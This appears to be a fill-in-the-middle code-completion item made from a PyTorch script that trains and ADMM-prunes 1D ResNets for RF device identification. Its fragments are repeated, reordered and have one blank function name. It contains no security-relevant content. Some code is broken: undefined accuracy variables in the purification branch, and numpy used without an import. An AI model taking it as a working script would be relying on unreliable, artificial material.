generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho)) | print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs)) | train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model) | random_line_split |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def | (initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
